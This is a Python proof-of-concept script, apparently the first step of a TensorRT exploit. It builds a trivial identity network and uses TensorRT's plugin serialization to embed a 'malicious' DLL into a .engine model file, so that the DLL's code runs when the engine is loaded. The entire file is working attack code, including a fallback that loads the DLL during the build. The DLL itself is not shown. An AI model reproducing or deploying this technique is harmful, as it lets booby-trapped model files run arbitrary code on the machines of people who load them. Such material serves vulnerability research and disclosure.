File size: 4,554 Bytes
a86b88f
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
124
"""
TensorRT ACE PoC - Step 1: Build a malicious .engine file with embedded plugin DLL.

This script:
1. Creates a simple identity network using TensorRT's network API
2. Serializes the malicious plugin DLL into the engine file via plugins_to_serialize
3. Saves the resulting .engine file

The .engine file will contain the embedded DLL that executes arbitrary code
when deserialized by TensorRT.
"""

import os
import sys
import tensorrt as trt

def build_malicious_engine():
    PLUGIN_DLL = os.path.join(os.path.dirname(__file__), "malicious_plugin.dll")
    ENGINE_FILE = os.path.join(os.path.dirname(__file__), "malicious_model.engine")

    if not os.path.exists(PLUGIN_DLL):
        print(f"ERROR: Plugin DLL not found: {PLUGIN_DLL}")
        return False

    logger = trt.Logger(trt.Logger.VERBOSE)

    # Create builder
    builder = trt.Builder(logger)
    if builder is None:
        print("ERROR: Failed to create builder")
        return False

    # NOTE: We skip load_library() - just embed the DLL directly.
    # TensorRT reads the file from disk for plugins_to_serialize.
    print(f"[*] Plugin DLL: {PLUGIN_DLL} ({os.path.getsize(PLUGIN_DLL)} bytes)")

    # Create a simple network (identity - just input -> output)
    network = builder.create_network(
        1 << int(trt.NetworkDefinitionCreationFlag.EXPLICIT_BATCH)
    )
    if network is None:
        print("ERROR: Failed to create network")
        return False

    # Add a simple identity layer
    input_tensor = network.add_input("input", trt.float32, (1, 3, 32, 32))
    identity = network.add_identity(input_tensor)
    identity.get_output(0).name = "output"
    network.mark_output(identity.get_output(0))

    print("[*] Simple identity network created")

    # Configure builder
    config = builder.create_builder_config()
    config.set_memory_pool_limit(trt.MemoryPoolType.WORKSPACE, 1 << 20)  # 1MB

    # KEY STEP: Serialize the malicious plugin DLL into the engine
    print(f"[*] Setting plugins_to_serialize: {PLUGIN_DLL}")
    config.plugins_to_serialize = [PLUGIN_DLL]

    # Build the serialized network
    print("[*] Building engine (this may take a moment)...")
    serialized_engine = builder.build_serialized_network(network, config)
    if serialized_engine is None:
        print("ERROR: Failed to build serialized engine")
        print("[*] Trying approach 2: load_library first, then serialize...")

        # Approach 2: load the library first (this triggers DllMain during build)
        registry = builder.get_plugin_registry()
        handle = registry.load_library(PLUGIN_DLL)
        print(f"[*] load_library result: {handle}")

        # Rebuild
        builder2 = trt.Builder(logger)
        network2 = builder2.create_network(
            1 << int(trt.NetworkDefinitionCreationFlag.EXPLICIT_BATCH)
        )
        input_tensor2 = network2.add_input("input", trt.float32, (1, 3, 32, 32))
        identity2 = network2.add_identity(input_tensor2)
        identity2.get_output(0).name = "output"
        network2.mark_output(identity2.get_output(0))

        config2 = builder2.create_builder_config()
        config2.set_memory_pool_limit(trt.MemoryPoolType.WORKSPACE, 1 << 20)
        config2.plugins_to_serialize = [PLUGIN_DLL]

        serialized_engine = builder2.build_serialized_network(network2, config2)
        if serialized_engine is None:
            print("ERROR: Still failed to build engine")
            return False

    engine_size = serialized_engine.nbytes
    print(f"[+] Engine built successfully! Size: {engine_size} bytes")

    # Check if engine is larger than expected (should contain the DLL)
    dll_size = os.path.getsize(PLUGIN_DLL)
    print(f"[*] Plugin DLL size: {dll_size} bytes")
    if engine_size > dll_size:
        print(f"[+] Engine is larger than DLL - DLL likely embedded!")
    else:
        print(f"[-] Engine seems too small - DLL might not be embedded")

    # Save the engine
    with open(ENGINE_FILE, "wb") as f:
        f.write(bytes(serialized_engine))
    print(f"[+] Malicious engine saved to: {ENGINE_FILE}")

    return True


if __name__ == "__main__":
    # Clean up proof file before build
    proof = os.path.join(os.path.dirname(__file__), "PWNED.txt")
    if os.path.exists(proof):
        os.remove(proof)

    success = build_malicious_engine()
    if success:
        print("\n[+] STEP 1 COMPLETE: Malicious engine built.")
        print("[*] Next: Run load_malicious_engine.py to test ACE")
    else:
        print("\n[-] STEP 1 FAILED")
    sys.exit(0 if success else 1)